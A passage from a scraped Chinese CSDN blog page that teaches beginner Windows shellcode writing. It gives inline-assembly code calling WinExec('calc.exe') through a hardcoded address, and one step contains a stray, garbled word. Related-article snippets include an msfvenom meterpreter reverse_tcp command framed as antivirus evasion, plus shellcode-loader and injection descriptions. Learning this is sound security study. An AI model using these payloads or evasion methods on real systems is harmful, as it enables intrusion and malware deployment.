java 加载shellcode_ShellCode的编写入门

最新推荐文章于 2023-09-21 18:11:04 发布
最新推荐文章于 2023-09-21 18:11:04 发布
阅读量270 收藏
点赞数
文章标签: java 加载shellcode
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39630140/article/details/114713415
版权

因此WinExec真正的地址是7C8623AD,注意,这里是要反过来读取。

三、现在有了汇编模样的语句和WinExec的地址,接下来就是要转化为具有Shellcode的汇编代码。在转化汇编时先了解汇编下面是如何完成一个函数调用的:

1、父函数将函数的实参按照从右至左顺序压入堆栈;

2、CPU将父函数中函数调用指令Call XXXXXXXX的下一条指令地址EIP压入堆栈;

3、父函数通过Push Ebp将基地指针Ebp值东方钽业堆栈,并通过Mov Ebp,Esp指令将当前堆栈指针Esp值传给Ebp;

4、通过Sub Esp,m(m是字节数)指令可以为存放函数中的局部变量开辟内存。函数在执行的时候如果需要访问实参或局部变量,都可以通过EBP指针来指引完成。

根据汇编调用函数特点,并使用压栈的方法将参数传递进行,便可得到如下代码:

点击(此处)折叠或打开

#include "windows.h"

int main()

{

LoadLibraryA("kernel32.dll");//4c801d7b

//WinExec("calc.exe",SW_SHOW);

__asm

{

push    ebp;

mov        ebp,esp;

xor eax,eax;

push eax;

sub esp,08h;

mov byte ptr [ebp-0Ch],63h; //c

mov byte ptr [ebp-0Bh],61h; //a

mov byte ptr [ebp-0Ah],6Ch; //l

mov byte ptr [ebp-09h],63h; //c

mov byte ptr [ebp-08h],2Eh; //.

mov byte ptr [ebp-07h],65h; //e

mov byte ptr [ebp-06h],78h; //x

mov byte ptr [ebp-05h],65h; //e

lea eax,[ebp-0ch];

push eax;                    //将calc.exe压入栈内

mov        eax,0x7C8623AD;

call    eax;                    //调用WinExec

mov esp,ebp;

pop    ebp;

}

return 0;

}

注意,字符串要以00H结束的哦,编译运行OK~~

四、到这里已经完成最难的部分了,接下来的工作即是将汇编在内存中的代码,即是Shellcode拷出来就是了。同样,在汇编代码任意一处下断点,让程序在断点处停下来,按Alt+8即可看到程序所在的内存地址,再按Alt+6调出内存窗口即可。

weixin_39630140
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java 加载shellcode_MSF-Shellcode生成和使用
weixin_29348211的博客
02-26 596
1使用环境Kali 2.0msfvenom2Msfvenom参数说明msfvenom –h 查看帮助说明:Options:-p, --payload 指定需要使用的payload(***荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: ...
java 加载shellcode_通用Shellcode加载
weixin_35780426的博客
02-26 935
Shellcode加载器是一种基本的规避技术。尽管shellcode加载器通常可以促进payload的初始执行,但是启发式检测方法仍可以标记payload的其他方面和行为。例如,很多安全产品可能会在内存中时对其进行检测,或者将特定的网络流量检测为恶意。我们将研究一些适合与加载器结合使用的后期开发框架,并研究如何嵌入其他类型的二进制文件(例如.NET和已编译的PE二进制文件)。博客系列的第一部分将介...
Java内存的利用技巧——通过jsp加载Shellcode
m0_69860228的博客
05-06 709
0x00 前言 本文基于rebeyond的《Java内存攻击技术漫谈》,以Tomcat环境为例,介绍通过jsp加载Shellcode的方法,开源代码,记录细节。 0x01 简介 本文将要介绍以下内容: 依赖tools.jar加载Shellcode 自定义类加载Shellcode 0x02 依赖tools.jar加载Shellcode 1.Java实现 通过enqueue函数加载Shellcode,测试代码: import java.lang.reflect.Method; public
java 加载shellcode_动态加载 ShellCode绕过杀软
weixin_32529429的博客
02-26 522
反病毒解决方案用于检测恶意文件,并且通常使用静态分析技术来区分二进制文件的好坏。如果是恶意文件本身包含恶意内容(ShellCode),那么依靠静态分析技术会非常有效,但如果攻击者使用轻量级的stager来代替下载并将代码加载到内存中,会发生什么?事实证明这样做可以绕过大多数杀软的查杀。虽然这种绕过方法并不是新鲜技术,但绕过反病毒软件对于大多数后门来说都是必要的,在这篇文章中,我们将使用virsca...
免杀对抗-java语言-shellcode免杀-源码修改+打包exe
最新发布
xiaoheizi的博客
09-21 1020
命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f jar -o msf.jar。1.点击启动jd-gui,将生成的msf.jar拖入其中进行反编译,点击file—save all sources导出反编译后的内容。1.将exe4j打包的exe程序再使用inno工具和jdk环境打包合并到一起,将文件上传目标系统,成功绕过检测。命令:jar cvfm 名称.jar META-INF/MANIFEST.MF .
ShellCode编写和利用
Hvnt3r的博客
03-06 1297
ShellCode编写和利用 原文链接:https://hvnt3r.top/2018/10/Shell-code编写和利用/ 在渗透测试和漏洞利用中,Shellcode是一个十分重要的部分,在二进制的安全研究中,Shellcode也充当着十分重要的角色,本文会记录我学习Shellcode编写和利用原理。 在程序中嵌入Shellcode并执行 首先拿一道十分简单的PWN题来演示程序是如何执行...
Shell 编程入门
青笔
09-30 238
前言 无论是前端,后端还是移动端,大数据,AI还是运维,等等。作为一个高效的 Coder 都必须掌握 shell 编程。So,本文将告诉,入门 shell 其实很简单,抽点时间就能掌握的高回报率的小技能。 1. 基础知识 1.1 命令行 包行命令和参数的行称为命令行。语法格式如下: command [arg1] [arg2] ... [argn] RETURN 其中 command 为命令的名称...
CDL_shellcode_源码
10-02
在本案例中,"CDL_shellcode_源码" 提供的是一种JavaScript实现的ShellcodeJavaScript Shellcode虽然不如传统操作系统(如Windows、Linux)中的Shellcode常见,但在某些场景下,如浏览器环境或Node.js环境中,它...
此源代码将生成 linux x86的 shellcode.rar_linux shellcode_shell
09-20
标题"此源代码将生成 linux x86的 shellcode.rar_linux shellcode_shell"表明包含的源代码是专门设计用来在Linux x86系统上生成shellcode的。"rar"文件可能是源代码的压缩包,而"shellcode_shell"可能指的是该...
The Shellcoder's Handbook_sentencekhp_shellcode_
09-29
Shellcoder's Handbook》是一本深受安全研究者和程序员喜爱的经典书籍,主要关注的是shellcode编写和利用。shellcode是一种特殊的低级代码,通常用汇编语言编写,用于利用软件漏洞来执行任意命令或者获得目标...
java安卓辅助源码-injection-stuff:PE注入、DLL注入、进程注入、线程注入、代码注入、Shellcode注入、ELF注入、
06-04
java安卓辅助源码 Injection PE注入、DLL注入、进程注入、线程注入、代码注入、Shellcode注入、ELF注入、Dylib注入,当前包括400+工具和350+文章,根据功能进行了粗糙的分类 目录 -> -> -> -> -> -> -> -> -> PE注入 工具 [535星][20d] [C] peinjector - MITM PE file infector [407星][5m] [Assembly] 将PE文件转换为Shellcode [230星][3y] [C++] Inject custom code into PE file [This project is not maintained anymore] [220星][2y] [C++] C++ application that uses memory and code hooks to detect packers [196星][30d] [Py] Search for code cave in all binaries [126星][3y] [C++] 将ROP编码的shellcode打补丁到PE文
shellload:将shellcode加载到新进程中,可以选择使用假名称
05-17
壳载 将shellcode加载到新进程中,可以选择将其隐藏在错误的进程名称下。 用法 简单的用法是将您的shellcode(十六进制编码)通过管道传输到stdin。 这将在当前的shellload进程中运行shellcode。 (提供的示例shellcode将运行touch itworks命令) $ printf "6a3b589948bb2f62696e2f736800534889e7682d6300004889e652e80e000000746f756368206974776f726b730056574889e60f05" | ./shellload64 中间用法是将shellcode作为参数传递。 这会产生一个运行shellcode的后台进程。 $ ./shellload64 6a3b589948bb2f62696e2f736800534889e7682d630000488
shellcode编程揭秘
03-04
教你怎么写shellcode,很好的shellcode编程范例,从稳定性到安全性都有讲
Java生成excel表格设置公式并填充数据
01-30
Java编程调用PageOffice实现从空白的excel文件动态生成excel表格,设置公式并填充数据。 集成PageOffice不但能够实现在线编辑、保存真正的Office文档,而且还可以轻松实现Word、Excel文档的动态数据填充、格式控制和用户输入提交的高级复杂功能。 PageOffice除了提供Word/Excel动态数据填充,格式控制,Word/Excel用户输入提交,Word/Excel/PowerPoint/WPS等Office文档的在线打开、只读浏览、编辑、保存等功能外,还给在线协同办公内置了强大的支持功能:可编辑区域控制,强制痕迹保留,并发编辑控制,手写批注,手写签名,圈阅签字,电子印章、动态模板套红等
一段动态装载DLL的ShellCode汇编代码
09-10
一段动态装载DLL的ShellCode汇编代码,不需要引入任何的库
Android系统shellcode编写.zip_android_shellcode
09-23
随着Android设备的广泛使用,Android系统的安全性变得至关重要,而shellcode编写和理解成为了安全研究的重要部分。 shellcode通常在黑客攻击中扮演关键角色,当一个漏洞被利用时,攻击者会尝试注入shellcode来...
shellcode_tools:用Python编写的其他工具,主要以shellcode为中心
05-26
Shellcode工具用Python编写的其他工具,主要集中在shellcode上。 bin2py:将二进制文件嵌入到Python源代码中。 shellcode2exe:将shellcode转换为多个平台的可执行文件。
【网络资源学习笔记】ShellCode相关内容学习
天在等我,菜鸟想飞
07-14 2484
个人shellcode相关网络资源学习记录
总结加载Shellcode的各种方式(更新中!)
xf555er的博客
05-24 2336
异步过程调用(APC)队列是一个与线程关联的队列,用于存储要在该线程上下文中异步执行的函数。操作系统内核会跟踪每个线程的 APC 队列,并在适当的时机触发队列中挂起的函数。APC 队列通常用于实现线程间的异步通信、定时器回调以及异步 I/O 操作。内核模式 APC:由内核代码发起,通常用于处理内核级别的异步操作,如异步 I/O 完成。用户模式 APC:由用户代码发起,允许用户态应用程序将特定函数插入到线程的 APC 队列中,以便在线程上下文中异步执行。
python编写shellcode加载
02-06
在 Python 中编写 shellcode 加载器的步骤如下: 1. 定义一个字符串变量,并将 shellcode 存储在该字符串中。 2. 使用 ctypes 库中的函数 `create_string_buffer()` 创建一个内存缓冲区。 3. 将 shellcode 复制到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值